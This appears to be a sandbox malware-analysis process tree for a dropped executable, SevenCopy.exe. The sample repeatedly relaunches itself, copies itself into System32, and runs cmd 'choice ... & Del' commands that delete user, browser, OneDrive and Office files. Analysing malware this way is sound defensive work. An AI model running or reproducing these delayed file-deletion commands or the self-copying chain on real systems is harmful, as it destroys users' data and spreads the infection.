C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Users\Admin\AppData\Local\Temp\SevenCopy.exe"C:\Users\Admin\AppData\Local\Temp\SevenCopy.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\BackupFormat.html"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\ResumeSkip.csv"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1713510654.txt"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI22D9.txt"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI22FD.txt"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI22D9.txt"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI22FD.txt"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\mapping.csv"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240419_070613265.html"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\msoia.exe_Rules.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"4⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
-
C:\Windows\System32\SevenCopy.exeC:\Windows\System32\SevenCopy.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"6⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"6⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"6⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"8⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"8⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"8⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"9⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"9⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"9⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"10⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 311⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"10⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 311⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"10⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 311⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"11⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"11⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"11⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 312⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133587466381798752.txt"12⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 313⤵
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\J30KZTGN\microsoft.windows[1].xml"12⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 313⤵
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"14⤵
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"16⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"18⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"22⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"23⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"25⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"27⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"30⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"31⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"32⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"33⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"34⤵
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"35⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"36⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"37⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"38⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"39⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"40⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"41⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"42⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"43⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"44⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"45⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"46⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"47⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"48⤵
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"49⤵
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"50⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"51⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"52⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"53⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"54⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\SevenCopy.exe"C:\Windows\System32\SevenCopy.exe"55⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
